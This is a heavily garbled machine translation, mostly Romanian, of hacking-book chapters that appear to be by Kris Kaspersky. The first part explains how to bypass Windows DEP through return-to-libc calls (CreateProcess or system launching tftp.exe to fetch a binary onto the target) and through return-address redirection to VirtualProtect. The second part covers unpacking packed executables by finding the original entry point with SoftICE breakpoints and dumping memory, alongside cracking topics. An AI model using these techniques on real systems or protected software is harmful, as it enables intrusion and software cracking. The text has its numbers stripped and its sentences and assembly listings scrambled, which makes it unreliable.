cu FCH Bugcheck, care prăbușește sistemul înecranul albastru, este exclusă Versiunile pe de biți ale Windows protejează de execuția fibrei nucleului, a piscineideplasate (piscina paginată) și a piscinei de sesiune și a stivei de de biți Dacă procesorul nu acceptă biții NX/XD,atunci sistemul activează implementarea software-ului (aplicată software), care nici măcar nu încearcă să imitestiva/grămada neîmplinită (și ar putea!) Tehnologia pe care Microsoft o promovează este de fapt o protecție primitivă aprocesorului de excepție structurală, cunoscută anterior ca capitolul Overflow Boofer în sisteme cu o stivăneîmplinită Safeseh Nu împiedică implementarea codului shell, ci complică utilizarea excepțiilorstructurale ale codului shell Apoi, ajutați la protejarea computerului, Windows a luat masa acest program Marne: WindowsExplorer Publisher: Microsoft Corporation Close Message Message Prevention Execuție ajută la protejarea daunelorîmpotriva virușilor și a altor amenințări de securitate Orez Reacția DEP la o încercare de a efectua cod pe stivă,vom discuta doar despre implementarea hardware a DEP, deoarece este cel mai dificil să ne deplasăm Unii chiar cred căacest lucru este în general imposibil: „ Astăzi nu există o singură exploatare conceptuală, care în practică caredovedește posibilitatea deteriorării către Ivindows XP cu pachetul stabilit de actualizare a serviciului de actualizareRep ” (http: // www ComputerRra ru /Softerra / ) Dacă apărarea DEP ar fi fost proiectată ținând cont de toatenuanțele, atunci așa ar fi Cu toate acestea, Microsoft merge în felul său și, prin urmare, DEP este fără dificultăți,dar utilizatorii legali au multe probleme despre care vom vorbi Este greșit să apelezi la un mecanism de protecție La„mecanismul de protecție” al DEP este foarte, foarte departe - cam la fel ca o mașină de jucărie pentru o mașinăreală DEP este doar suport pentru atributele de protecție a paginilor și nimic mai mult!По данным компании Intel, XD-битподдерживают следующие операционные системы, предотвращающие непреднамеренное исполнение кода в неисполняемых областяхпамяти: П Microsoft Windows* Server с Service Раск П Microsoft Windows* ХР* с Service Раск □ SUSE Linux* ПRed Hat Enterprise Linux Update , cu toate acestea, această măsură nu va opri hackerii intenționați, iar toatesistemele pot fi atacate, iar Windows este mai ușor de atacat decât Linux Configurare Dep pe de biți Ediții Windowsatunci când lucrați într-un mod nativ, utilizați întotdeauna depozite și nu permiteți blocajul acestei protecții Dacădezvoltatorul dorește să execute codul pe stivă sau într -o grămadă (iar dezvoltatorii doresc acest lucru destul dedes), el ar trebui să atribuie în mod clar atribute de acces acestei regiuni de memorie apelând la Virtlualloc sauVirtualProtect Nu sunt necesare drepturi pentru acest lucru, așa că obținem doar apariția securității - protecțieîmpotriva accesului neintenționat, dar nimic mai mult Un pic mai departe în acest capitol (a se vedea secțiunea „Atac peDEP”) vom arăta cum să ocoliți Set de măsuri de protecție dezvoltate de Microsoft pentru a preveni utilizarea unui codShell de procesor de excepție structurală (SEH) a fost redenumit ulterior DEP-ul forțat software Partea V Capacitatea de cordon practică cu aplicații pe de biți, lucrurile sunt mult mai complicate Există un număr imens desoftware deja scris care interpretează atributul -g- as -x și refuzând să lucreze, dacă nu Prin urmare, pentru a menținecompatibilitatea inversă, Microsoft a oferit posibilitatea de a dezactiva DEP pentru aplicațiile Windows pe de bițiși pe de biți efectuate în versiunile de de biți ale Windows Pentru a utiliza mecanismul DEP, este necesar ca unprocesor să susțină NX/XD-Bits, iar procesoarele pe de biți acceptă NX-BI numai în modul de extindere a adreselorfizice (Extensia adreselor fizice, Paradis) Edițiile Windows pe de biți recunosc automat tipul de procesor, dacă estenecesar, adăugând cheia /paradisul în fișierul boot ini Edițiile pe de biți nu au un raedara separat, deci nu estenecesar să adăugați o cheie / paradis pentru ei Cheile de fișier boot ini responsabile pentru DEP și setează setărilepentru versiunile de și de biți ale Windows sunt enumerate pe scurt în tabel Tabelul Setările de fișiereMI Boot MI și regiunile de memorie protejate de cod în versiunile de și bit ale Windows Cores Bootini /Executați ZnOExecute Versiuni pe de biți ale Windows: Dep Kernel este dezactivat Modul DEP de utilizator estedeconectat -Bit versiuni ale Windows: de descărcare de utilizare a modului DOP DEP Activat Modul de kernel Depeste activat Modul DEP de pe de biți este activat dacă nu sunt indicate taste suplimentare, apoi în ediții Windows pe de biți,codul de pe stivă, în nucleu și în unele servicii de sistem ale nivelului aplicat va fi interzis Toate celelalteaplicații vor fi executate în modul normal În mod implicit, versiunile pe de biți permit performanța COD pestivă/grămadă doar pentru aplicații pe de biți, iar pentru de biți sunt interzise Cheia /Executarea deconecteazăcomplet DEP pentru ediții Windows pe de biți, precum și pentru aplicațiile pe de biți efectuate sub Windows pe de biți În același timp, influența acestei cheii nu se aplică aplicațiilor „native” pe de biți și rămân în continuareprotejate KEY /POHEESIA = Politica de nivel vă permite să configurați DEP la discreția sa, alegând nivelul necesar desecuritate Parametrul politic politic poate lua una dintre următoarele valori: întotdeauna, întotdeauna F, OPTLN șiOPTOUT descrise în tabel Tabelul Impactul nivelului de politică asupra valorii parametrului de siguranță aOPTLN (implicit) Protecția DEP este activată numai pentru un număr limitat de procese de sistem Windows și pentrunucleul OPTOUT, protecția DEP este activată pentru toate procesele și nucleul, cu toate acestea, dvs Poate forma olistă de aplicații pentru care protecția nu aplică întotdeauna de protecție pentru toate procesele șinucleele Deconectați protecția selectivă pentru aplicațiile specificate de utilizator nu poate fi întotdeauna OFFProtecția Dep este dezactivată pentru toate procesele și nucleul Lucrează prin tehnologia extinderii ferestrei deadresare (Fereastra de adrese extinsă AWE) GPAVA Overflow Boofer în sisteme cu o stivă neîmplinită Fig Configurare Dep interactivă, pe lângă editarea fișierului boot ini pentru a configura DEP, puteți utiliza unconfigurator interactiv (Fig ) Configuratorul interactiv, desigur, nu este destinat hackerilor, ci pentruutilizatorii obișnuiți și, în plus, un set de opțiuni furnizate care pot fi configurate cu ajutorul său, estelimitată Lista de programe pentru care protecția DEP este dezactivată poate fi formată prin intermediul registrului(calea pur și simplu economisind mult timp) Deschideți doar HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \AppCompatFlags \ Layers și creați un nou element String în IT (date Reg sz) Numele acestui element ar trebui să fie ocale completă către Ehe-File, protecția căreia dorim să ne oprim Alocați valoarea DezablenxShowui la noulelement Problemele de compatibilitate sunt necesare pentru atât de multe aplicații: mecanisme de protecție, emulatoare,compilatoare just-in-timp, etc Încercările de a face sticla nedorită în mod repetat au fost făcute în - de ani aisecolului trecut, când sistemul de operare Windows nu a fost există și nu a existat în proiect Și toate aceste inovațiicumva nu au luat rădăcină Acest lucru s -a întâmplat din cauza problemelor de compatibilitate Cine are nevoie desistemul de operare dacă nu puteți rula aplicațiile preferate pe acesta?Nu Este Ieşire Sau securitate saucompatibilitate Un compromis este imposibil Prin urmare, Microsoft a dezvoltat doar o parodie de apărare și a oprit -oimediat, astfel încât utilizatorii să nu aibă probleme inutile Cu toate acestea, au apărut încă problemele Încercați săcompletați cheia pentru cheia pentru cuvântul cheie pentru baza Microsoft KnowLDEDGE pentru a vedea ce conflicte suntgăsite doar partea V Codic practic care se încadrează cu produsele Microsoft în sine Dar Microsoft, conform tuturorconceptelor, trebuia să ofere continuitate și compatibilitate adecvată Aici, de exemplu: □ hardware (DEP) -computerulanabilat a renunțat după ce reluați standby -ul față sau de la hibernare în Windows XP Service (cu asistență hardwareactiv, poate trece pe neașteptate cu un pachet sau hib : //Support microsoft com/implicit aspx? scid = kb; en -us; □ Primești un mesaj de eroare „Prevenirea executării datelor” atunci când începeți reuniunea live (призапуске ședință live появлnminist ; En-Sus; , □ primiți mesaje de eroare atunci când emulatorul YouTallWindows CE X pe un computer care rulează Windows XP Service Pack Există un mesaj de eroare):http://support microsoft com/defaultAspx? Skid = kb; en -us; Lucrurile pentru producătorii de al treilea -partysunt și mai rele Pachetele și protecțiile cu balamale folosind un cod auto -modificat și alte trucuri anti -haker nu potfuncționa cu o stivă neîmplinită Aceasta înseamnă că protecția DEP ar trebui să fie deconectată pentru ei Unii oamenipot susține că toate problemele din stilul „greșit” de programare și utilizarea „fără documente” Caracteristicile sistemului (care sunt de fapt destul de documentate) Cu toate acestea, există probleme nu numai înrândul artizanilor, ci și la firme foarte eminente, de exemplu, Borland Mergem la „baza de cunoștințe”(http://support borland com), ridicăm depozitul și obținem imediat multe link -uri, de exemplu: □ „Instalarea clientuluinu rulează” (http: //support borland com/intrare! Default jspa? CategoryId = & EXTERALID = & fromsearchPage =true) □ "Cine face / primește o eroare de memorie GPF la instalarea Startream pe Windows ?")□ "Startream ServerInstaller nu pornește Windows XP/Windows " (http://support borland com/entry! DePhalt jspa? CategoryId = &EXTERALID = și FromSerchpGPage Astfel, DEP este un conflict foarte conflict care creează multe probleme și nuprotejează nimic de nimic Microsoft a făcut multe greșeli grave care vă permit să pătrundeți prin depozite chiar și lanivelul maxim de securitate Toate discuțiile suplimentare sunt aplicabile atât edițiilor Windows pe și pe de bițiși nu depind de setarea sistemului Pentru certitudine, vom presupune că cheia /noexecute este setată pe pozițiaîntotdeauna Atacul de pe Dep Microsoft a confirmat posibilitatea de a ocoli plecarea în ianuarie , când un articolal lui Alexander Anisimov „învingerea Microsoft Windows HP Aproape Protection and Dep Bypass” (http:/maxpatrol com/ptmspatrol com/ptmshorp ) A apărut pe Maxpatrol Cu toate acestea, Microsoft nu a acordat prea multăimportanță în acest sens, spunând că nu ar fi posibil să se implementeze un atac la distanță: „Un atacator nu poateutiliza de la sine să conducă rău intenționat pe un USRM La NSKFrom (atacul nu poate folosi această metodă pentru aLansați cod rău intenționat pe sistemul țintă Nu s -a demonstrat încă un singur atac folosind acest truc, iarconsumatorii nu sunt expuși riscului - http: //www eek eom/ articolul / , , oo ask) Nu este delocașa!Mecanismul DEP se poate rupe cu ușurință de la orice distanță Rezultatul atacului este codul shell transmis șiexecutat cu succes, efectuând comenzi în avans pregătite de atacator Pentru a înțelege cum se face acest lucru, este maiîntâi necesar să descoperiți capitolul Revărsarea tamponului în sisteme cu o stivă neîmplinită cu metode clasicede preaplin Aceste probleme sunt înțelese în detaliu în articolul „Erori ale revărsării tamponului din exterior și dininterior ca o experiență generalizată a atacurilor reale” (http://www samag ru/art/ / pdf )Reamintimcititorul principalele dispoziții: Lipsa de control a limitelor tampoanelor locale vă permite să ștergeți adresa deîntoarcere din funcție, plasând un indicator aici pe codul shell, care se află aici în stivă Un alt tip de revărsareeste asociat cu o grămadă Cu ajutorul său, un hacker poate modifica orice celulă rescrisă în spațiul de adrese al unuiproces vulnerabil De exemplu, puteți înlocui indicatorul cu o funcție virtuală sau falsificați adresa de retur (Fig ) Există și alte oportunități În special, atacatorul poate schimba procedura obișnuită pentru selectarea blocurilorde memorie dintr -o grămadă, plasând următorul bloc selectat în partea de sus a structurilor cheie de date, dar pentrusimplitatea prezentării, ne limităm la modificarea adresei de retur FIG Local Boofer Adresa de întoarcere Fig Unatac clasic la distanță este un sigiliu al codului cochiliei către stivă, urmat de transferul de control către acestaprin modificarea adresei de retur, există multe mecanisme de protecție care controlează integritatea grămadă și adresade retur, dar nu pot face față cu sarcina lor Acesta este un subiect mare separat, care nu este conectat în niciun felnici cu biți NX/XD, fie cu tehnologia DEP Acesta va fi examinat în detaliu în cărțile ulterioare, acum ne limităm lafaptul că DEP nu este în niciun fel împiedică modificarea adresei de retur Există multe programe care vă permit cuadevărat să faceți acest lucru (Internet Explorer, Firefox etc ) Prin manipularea adresei de retur, hackerul poateprovoca funcții arbitrare ale unui program vulnerabil (inclusiv funcția Ari a sistemului de operare), transmitândparametrii necesari prin stivă Desigur, în același timp, va fi foarte limitat în capacitățile sale, deoarece printrefuncțiile gata, nu sunt atât de multe cele care sunt cu adevărat utile pentru hacking Cu toate acestea, este posibil sărezolvați problema apelând la funcția CreateProcess ARI sau la funcția de sistem din biblioteca CRT prin lansarea unuiprogram standard TFTP exe și pompând un fișier binar pe computerul atacat, care poate fi executat folosindCreateProcess/System ( Tip de atac return-libc) Mecanismul DEP nu interferează cu acest scenariu, deoarece în acest cazcodul shell este transmis nu prin stivă/pile, ci prin fișierul executabil legal Stack conține doar argumentelefuncțiilor cauzate și adresele de întoarcere „false”, indicându -le Astfel, chiar și atunci când hackerul a pornit, oportunitatea de a -și arunca codul pe mașina atacată șide a transfera controlul asupra acestuia Prezența TFTP exe nu este o condiție prealabilă pentru atac Chiar dacă esteeliminat, hackerul poate provoca, de exemplu, cmd exe Este suficient să redirecționați ieșirea către fișier și cuajutorul EST să creeze un fișier COM minuscul care face ceva „util” Da, iar cel mai vulnerabil program conține cusiguranță funcții prin care puteți descărca un fișier de pe internet într -un cuvânt, oportunități - marea!Atacurilede acest tip sunt bine studiate de hackeri și descrise în literatură Se pare că doar experți din Microsoft nu știunimic despre acest lucru, altfel cum poate misteriosul fapt că succesul acestui tip nu depinde de activitatea DEP, iarvechile exploatări își păstrează complet performanța Distribuția viermilor se oprește doar pentru că, împreună cu DEP,un pachet de actualizări include patch -uri pe toate găurile cunoscute Cu toate acestea, cm, de exemplu, articolul „Opeficiența randomizării spațiului de adrese” (http://www stanford edu/~blp/papers/asrandom pdf) (Unii pot spune că acesta nu este un atac real, deoarece nu are o transmisie clară acochiliei prin stivă și tocmai pentru aceasta este proiectată mecanismul Dep!Gândul, desigur, este inteligent, daramuzant Și ce fel de hacker va fi grăbit la îmbrățișare dacă puteți ajunge la ținta prevăzută?Microsoft crede cuadevărat că atacatorul joacă în conformitate cu „regulile” și urmează calea celei mai mari rezistențe, urcând pe o calede munte șerpuită umplută cu patrule, când drumul de stâlp nu este păzit de nimeni?Ca încălzire, considerăm un scenariualternativ al unui atac care transferă Shell prin stivă Aruncarea trebuie să fie într-un tampon local nu este oproblemă, înlocuiți adresa de returnare Dar atunci când încercați să transferați controlul în codul shell, va apărea oexcepție cu un DEP activ, deoarece nu avem X atrica, deși în acest caz totul depinde de ceea ce suntem copleșitori Așacum am menționat anterior, unele aplicații (inclusiv browsere) au nevoie de o stivă efectuată în care adaugă un cod Javacompilat Dar nu vom înmuia condițiile Să credem că nu există pagini efectuate în stiva noastră Pentru a le obține,trebuie să renunțați la NX/XD-BIT (dar acest lucru poate fi făcut doar de către sistem), fie sunați la funcțiaVirtualProtect, atribuind atribute de protecție după voie!Dar cum vom numi VirtualProtect fără posibilitatea de aefectua cod shell?Da, este foarte simplu - vom ajusta adresa de retur, astfel încât să indice VirtualProtect, apoiatunci când efectuați comanda Retum, va transfera această funcție în această funcție!Stack State înainte de manipulăriExplicația lui Butfer [ ] Restul Stack Ret Adresa Sisdigada (O) Stack Stack după manipularea cochiliei-CCCES "Succes!;) % pentru a vizualiza antetul sau tasta - pentru a vizualiza objtbl În programele normaleexistă secțiuni cu nume Text, Cod, Date , Rdata, RSRC și, cel mai important, dimensiunea virtuală (virtuAisize)secțiunea de cod coincide aproape întotdeauna cu fizic (fizsize) De exemplu, în aplicația „Notepad”, care este inclusăîn furnizarea standard a Windows NT, diferența este de doar OH - CAH == H octeți, iar secțiunea fizică datoratăegalizării este chiar mai lungă decât imaginea sa virtuală (Fig ) Orez Dispunerea secțiunilor din fișierulGPAV instabil Pungi de luptă Fig Aspectul secțiunilor fișierului ambalat și acum ne vom împacheta fișierulfolosind Aspack (sau o geantă similară) și vom vedea ce se va schimba din aceasta (Fig ) Wow!A apărut imediatsecțiunile spack și adata cu numele care vorbesc de la sine Cu toate acestea, numele secțiunilor pot fi schimbate -acesta nu este principalul lucru Dimensiunea virtuală a secțiunii Textul ( H) este de două ori diferit de dimensiuneasa fizică ( H) Dar asta spune deja multe!De fapt, autorul Aspack a alocat în avans o dimensiune virtuală Existăambalatori care compară dimensiunea virtuală cu fizicul, evidențiind memoria necesară direct în procesul de despachetarea VirtualAlloc De asemenea, puteți încerca să calculați entropia (măsura tulburării sau redundanța) a fișieruluistudiat Popularul editor Hex NTE poate face acest lucru (Fig ) Cu cât valoarea entropiei este mai mare, cu atâteste mai mare probabilitatea de ambalare și, în consecință, invers Cu toate acestea, această regulă nu funcționeazăîntotdeauna Orez Calculul entropiei folosind editorul NTE Partea V Codicopaging practic Fig UtilitateaPEID determină automat tipul de pachet/benzină de rulare În plus, aș dori să notez utilitatea PEID gratuită(http://peid has it/), care determină automat cele mai populare ambalaje (protectori) în funcție de semnăturile lor (Fig ) și chiar încearcă să despacheteze fișierele ambalate cu ajutorullor Cu toate acestea, lucrurile nu contează cu despachetarea și este mai bine să folosim unpackers specializați sau ainoștri, pe care îi vom scrie puțin mai târziu pe un asamblator pur Ambalarea și alternativele sale încearcă să răspundăla o întrebare care doar la prima vedere pare stupidă Aici sunteți cu toții primii care te străduiești să despacheteziprogramul, adesea fără să te gândești măcar - de ce?Se poate susține că, spun ei, un program ambalat nu poate fiDizassmit Şi ce dacă?Dar poate fi depanat folosind tehnica clasică de hacking descrisă în special în „Fundațiilefundamentale ale hackerismului” Da!Packer/benzi de rulare nu funcționează sub depanare!Bine!Încercați să rulațiSoftice după ce programul este despachetat și fereastra principală apare pe ecran sau instalați patch -ul neoficialIcext (http://stenri pisem net/), ascunzând debuggerul de majoritatea protecției O serie de utilități precum Lordpe(http://www softpedia com/get/programming/file-editors/lordpejshtml) ne permit să salvăm depozitele unui program dejadespachetat pe disc Deși imaginea rezultată a fișierului EHE rămâne adesea incorectă, este destul de potrivită pentrudezasamblare, mai ales dacă Dizassembler este utilizat împreună cu un debugger care ajută la „spionul” valorilor unorvariabile în diferite etape ale inițializării O da!Programul ambalat nu poate fi plasat Adică, chiar și după ce am găsitJX -ul apreciat, oprind apărarea, nu putem modifica fișierul ambalat, deoarece nu va fi acolo niciun JX, desigur Înacest caz, el a fost inventat de Heine Patches (patch-uri on-line), care guvernează programul „din zbor” direct în RAM,ocolind discul Mai mulți hackeri avansați își scriu propriile generatoare de numere de serie/fișiere cheie, pe bazainformațiilor obținute de la Dump Cumsy sau de depanare live Apare o situație ambiguă: pe de o parte, este încă posibilsă se evite dezambalarea în majoritatea cazurilor, dar, pe de altă parte, lucrul cu un fișier despachetat este mult maiconvenabil și mai confortabil (cel puțin pur psihologic) Prin urmare, trebuie să vă scrieți propriuldespacker!Algoritmul de despachetare Cum sunt scrise despackers?Există căi diferite Hackerul poate studia și dureroslucrarea pachetului în debugger/dizassembler, și apoi la despacker autonom, procesând corect fișierul executabil, ținândcont de specificul unei anumite situații, se dezvoltă corect și dureros Chris Kaspersky „Fundațiile fundamentale alehackingului” —M : Solon-R, Capitolul Lupta împotriva pungilor și iată un alt mod: derulăm programul pe unprocesor „viu” (sau sub un emulator precum Bochs), determinăm momentul finalizării lui Dezambalarea într-un fel saualtul și mențineți-o imediat imaginea memoriei pe disc, formând un re-fișier efectuat din el Rezultatul este undespacker universal, pe care îl vom scrie O mică teorie pentru început În căutarea OER, crearea unui despacker universalîncepe cu algoritmul pentru determinarea punctului de plecare al intrării (punctul de intrare original, OEP) Acestalgoritm ar trebui să urmărească momentul finalizării dezamblării cu transferul ulterior al programului decontrol Aceasta este cea mai dificilă parte a unpackerilor universale, deoarece este imposibil să se stabilească punctulde plecare al intrării Pentru a face acest lucru, trebuie să recurgeți la diverse trucuri Cel mai adesea, pentru aceastaeste utilizată o urmă de pas, pe care o poate rezista cu ușurință (și se confruntă cu ușurință!) Puțin mai bun tras alinelului zero face față sarcinii Este aproape imposibil să le faci față de la nivelul aplicat (și majoritateapachetelor/protectoarelor lucrează pe acesta) Cu toate acestea, dezvoltarea unui astfel de tracer este adesea o sarcinăcopleșitoare pentru începători Prin urmare, să încercăm să mergem în sens invers, limitându -ne doar la punctelehardware ale opririi, pentru instalarea căreia este complet opțional să recurgem la scrierea șoferului În prima etapă,ca principalul remediu experimental, vom folosi „caietul” comprimat de diverși pacheți, precum și faimosul debuggersoftice Codificarea va urma mai târziu Programul Dump Of The Living este cel mai simplu (și cel mai popular) mod de acombate pachetele - eliminarea dump -ului în cunoștință de cauză după finalizarea dezambatului După ce a așteptatapariția ferestrei principale a programului, hackerul își aruncă groapa Uneori, această metodă funcționează, alteorinu Să încercăm să ne dăm seama de ce se dovedește Luați aplicația clasică „Notepad” din furnizarea Windows NT, care nupoate fi considerată protejată Fără a -l împacheta, vom încerca să eliminăm depozitele folosind unul dintre cele douăcele mai bune dump -uri - Proc Dump sau Lord Pe Deluxe (Fig ) Încărcați -vă în editorul PE (numai citiți) fig Îndepărtarea gropii din „Notepad” de lucru Partea V Codicopaging practic Nezumi Fig Un „notebook” în modnormal (de sus) și același „caiet” după eliminarea depozitului (de mai jos) - toate liniile de text au dispărut cusucces, iar fișierul rezultat este chiar lansat (Fig ), dar se dovedește că nu este destul de eficient Atenție -antetul ferestrei și toate inscripțiile text din dialoguri au dispărut!Dacă nu am reușit să eliminăm depozitele chiar șidin „caiet”, atunci nu putem face față unei protecții reale Să încercăm să ne dăm seama de ce?Ancheta arată că liniilede text dispărute sunt stocate în secțiunile de resurse și, prin urmare, sunt procesate de funcția deîncărcare Descărcăm fișierul original Notepad exe în IDA RGO și găsim ciclul care citește liniile prin funcțiaLoadStringw (sufixul W înseamnă că avem de -a face cu liniile în format Unicode) Luați în considerare acest ciclu maiîndeaproape (listarea ) Rlep ETP este un indicator pentru LoadStringw ;Indicator la tabelul resurselor ;Cod xref:sub ee+ ij;Încărcăm următorul indicator;Pe uid în EAX Capitolul Lupta împotriva pachetelor H PUSHEBX;NBUFFERMAX H;(lungimea maximă a tamponului) PUSH ESI;IPBUFFER (Pointer to the Buffer) HPUSH DWORD PTR [EAX];Transmitem funcția extrasă UID H PUSH [ESP+ OCH+ HLNS TANCE];HLNSTANCE AH CALLEBP;LOADSTRINGWW AH;Citim următoarea linie AH;Din resursă CH MOV ECX, [EDI];Încărcăm același uid înUE EH INC EAX;Creștem lungimea unei chestiuni de EH;Linii pentru FH CRRP EAX, EBX;"^Linia urcăîn tampon? lh mov [ECX], ESI; păstrăm indicatorul la tampon ; în partea de sus a vechii UID ;(nu va mai fi nevoie) H H Lea Esi, [ESI +Eax* ]; poziție pentru următoarea linie; poziție pentruurmătoarea linie; H; în buffer Sub Ebx, EAX; Reduceți BUFER DH CNP EDIS? H Scurt LOC ;Tocați ciclul până la sfârșitul resurselor Analiza codului dat în lista arată că „Notebook” ia următoarea linieidentificator de la tabelul de resurse de resurse , încarcă linia, plasându -l în tamponul local, apoi păstreazăindicatorul rezultat pe linia deasupra celui de identificator în sine, laRăsucit nu mai este nevoie!Un truc clasic cuutilizarea variabilelor eliberate, cunoscută de la primul PDP, dacă nu mai devreme, „Notepad” a scris un programatorcompetent, legat cu atenție de resursele de sistem în general și în memorie - în special Pentru noi, acest lucru, înprimul rând, înseamnă că depozitele eliminate din programul „viu” vor fi inferioare În loc de identificatori de liniireale, secțiunile de resurse conțin semne pentru memorie care indică în „cosmos”!Prin urmare, liniile de resurse audispărut În multe programe, există un design similar cu listarea în listare : Listarea „Protecție” împotrivaamortizării programelor vii rolul *p = ;// variabilă globală if ('p) p = malloc (buff size);Evident, dacă salvațidepozitele de depozite ale programului după finalizarea liniei cu IF, atunci variabila globală P va conține indicatorulmoștenit de la lansarea anterioară, dar regiunea de memorie corespunzătoare nu va fi alocată, iar programul se vaprăbuși sau se va prăbuși, fie Urcați în datele altor persoane, aranjându -le, aranjându -le, aranjând că există oadevărată agitație!Formulăm regula principală: puteți salva programul de dump doar la punctul de intrare!Acum estenecesar să aflați cum acest punct de intrare în Nagi Căutarea codului de pornire de către semnături în programatoriiîncepători de memorie consideră că programul începe cu funcția principală (pe C/C ++) sau procedurile Begin (On Pascal),dar acest lucru este incorect Primul se numește întotdeauna codul de pornire (cod de pornire), care stabileșteprocesorul principal de excepții structurale, inițializarea RTL, care determină GetModuleHandle să obțină deskiciperulmodulului curent, etc V Capacitatea practică a codului există din mai multe coduri de pornire diferite selectate decompilator în funcție de tipul de program și taste de compilare În special, textele originale Codurile de pornire Microsoft Visual C ++ sunt stocate în catalogul \ Microsoft Visual \ VC \ CRT \ SRC subCRT* * Există aproximativ o duzină de ele Alți compilatori, de exemplu, Delphi, au, de asemenea, propriile coduri depornire (listarea ) Listarea Пример стартовоchimо кода на Delphi Cod: ее Start Proc în apropiere de cod: ее Push EBP Code: ее mov EBP, ESP cod: EEB ADD ESP, OFFFFFFFOH CodeSysinit :: linkproc intexe (Codvoid: ef push ; cod xref: start+cod BJP: D C Cod: D C Cod: D D Cod: D F Code: DA Code: DA cod: DA Code: DA : DBC Cod: DBE Cod: DC Cod: DC Cod: DCA Cod: DCFCod: D Cod: DD @sysinit @@ intexe $ qqrpv Proc CALL GetModuleHandlea Mov DS: DWORD D , EAX MOV EAX, DS:DWORD D MOV DS: DWORD - C, EAX XOR EAX, EAX MOV DS: DWORD - , EAX XOR EAX, EAX MOV DS: DWORD , EAXCall @sysinit @ Mov Edx, Offset unk Mov EAX, EBX Call Sub - a ; ipmodulname; syslnit :: - princolectarea unei colecții impresionante de coduri de pornire (sau împrumutând -o de la IDA Pro), vom găsi cu ușurință oercu scanare simplă a manechinului, eliminată, eliminată din programele „vii” Încărcarea programului FișierDumped exe înhiew și, sortând semnăturile tuturor codurilor de pornire una după alta, găsim „ale noastre” Ne amintim adresa sa (înexemplul considerat, este localizată în funcție de deplasarea i H) Încărcăm programul ambalat în debugger șiinstalăm hardware -ul pentru execuție la această adresă - BPM X Notă În mod implicit, debuggerul pune punctulde oprire pentru citire/scriere, ceea ce nu este unul și același acum, după ce am înconjurat unpackerul, debuggerul (saudumper -ul nostru, pe care l -am amortizat să scriem puțin mai târziu) apare direct la OER!Este timpul să păstrațigroapa programului!Câteva moduri populare, dar nereușite: GetModuleHandlea și GS: Biblioteca de semnătură este,desigur, bună, dar prea supărătoare Noile versiuni ale compilatorilor sunt adesea lansate și, în plus, dezvoltatorul deapărare ar putea modifica ușor codul de pornire, orbind căutarea semnăturii Ce să faci atunci?Destul de des, instalareapunctelor GPAVA Lupta împotriva celor de pachete de pe GetModuleHandlea (BPM GetModuleHandleA X) și pe filtrulexcepțiilor structurale (BPM FS: ) Să începem cu funcția GetModuleHandlea, care este prezentă în aproape fiecare cod depornire (excluzând unele trucuri de asamblare) Facem clic pe combinația de tastatură + Pentru a apela Softice,dați comanda BPM GetModuleha X și porniți aplicația studiată („Notepad”), după ce am ambalat -o cu orice arhivar destulde frumos, de exemplu, aspack sau upx Deoarece instalarea punctului de oprire este de natură globală, toate programelecare se adresează GetModuleHandlea vor duce la supravegherea depanatorului Uită -te cu atenție la numele programuluiafișat de debugger în colțul din dreapta jos (Fig ) Dacă acesta nu este un program „nostru”, faceți clic pe sau + pentru a ieși din debugger Aici, în sfârșit, după o serie de carcase false, în colț apare o linie deblocare Când se întâmplă acest lucru, oferim debugger comanda P RET pentru a ieși din funcție la codul care o provoacădirect Cu toate acestea, ne găsim nu în vecinătatea punctului inițial al intrării, ci în codul lui Unpackerînsuși Pentru a realiza OER, este necesar să se poine din nou programul Un card de memorie va ajuta la determinareadislocării noastre Dăm comanda Mar și urmărim ce va spune debuggerul (Fig ) Orez Funcția H: Apelați[EBP+F DH] - Acesta este GetModuleHandleA în cazul SAM, fișierul Notepad exe cauzat într -un mod atât de complicat esteformat din mai multe secțiuni: Text (cod comprimat al programului sursă), Data (comprimat date de date), RSRC(Resurse comprimate ale programului sursă), Aspack (cod unpacker) și ADATA (DATE DEPACKER) Secțiunea programului sursăse încheie cu adresa i h, iar tot ceea ce se află mai jos nu mai aparține acestuia Și funcția poate oferi, deasemenea, comanda BPX GetModuleHandleA Dar, în acest caz, Softice va introduce punctul de stop al programului CCH laînceputul funcției GetModuleHandlea, care poate detecta multe protecții Partea V Codicopagarea practică aGetModuleHandlea este chemată la adresa I I H, care, așa cum este ușor de instalat, aparține secțiunii Aspack Astfel,funcția se referă direct la unpacker în sine, iar OER nu are nimic de -a face cu ea (în plus, GetModuleHandlea poateprovoca, de asemenea, DLL -uri statice Părăsim debuggerul, apăsând + până la provocare GetModuleHandleA nu va fi găsit în secțiunea Text Pentru a automatiza sarcina și a evita apăsările repetate + ,puteți seta un punct condiționat de oprire în getModulehandlea x dacă (eir + pentru a nu mai rămâne aici Următoarea supraveghere a debuggerului nu are niciun sens (lista ) Escilând Următorul răspuns al punctului de oprire la ESP- B: A PUSH HEB B: A PUSH EKH B: A PUSHH EU B: A PUSH EDI Ne regăsim într-o zonă complet necunoscută Este clar doarcă registrul ebraic împreună cu alte registre este păstrat în pahar Faceți clic pe + și așteptați maideparte Dar de data aceasta am avut noroc (listarea )!Listarea L Tranziție la OER: și EIR- B: AZ V: AZB D ROR FFE JMP EAX ( H) Registrul Heraera este împins din stivă, iar după aceasta, tranziția la OEReste realizată prin comanda JMP EAC Totul merge bine, numai lucrările false sunt enervante La urma urmei, numai hackeriiexperimentați în ochi pot distinge locul în care managementul este transferat către OER și unde nu este așa Cuautomatizarea în această privință, este mult mai dificil, computerul nu are intuiție umană Dar până acum ne distrămdoar Nu vorbim despre lupta împotriva protectorilor Luați un pachet mai serios FSG de Bart/XT(http://xtreme prv pl/, http://www wasm ru/bakeado php?mode=tool&id= ) și aveți (listarea ) Listarea Unpunct de intrare promițător la Packer FSG B: v XCHG ESP, [ B ] V: A Popad V XCHG EAX, ESP C Push EBP V: d Abp v: d Abp AlFSG reconfigrează registrul FSP și, deși dupăun timp, îl restabilește din nou, nu ne adaugă prea multă bucurie Ambalatorul folosește intens stiva, astfel încâtpunctul de oprire al BPM ESP- produce milioane de lucrări false, majoritatea apar în ciclu (lista ) Listarea Code fragment generating false works of the stop point B: C E POP ESI V: C AD Lodsd v: CZ XCHG EAH, EDI Part V Practical Corpoam B: B EAC B B B B B B B B B B B B B Să ne gândim!Dacă codul de pornire al programului ambalat începe cu un prolog standard precumPush Heb/Mov Heb, ESP, atunci punctul de oprire al BPM ESP- LF *(ESP) = EBP va devia o grămadă de gunoi, dar vafuncționa la orice nivel standard de investiții zero În plus, un program ambalat poate avea un prolog optimizat în careregistrul Hebus nu este utilizat Și iată o altă idee Să presupunem că gestionarea este transmisă către OER princomenzile OEP/Retn Offset 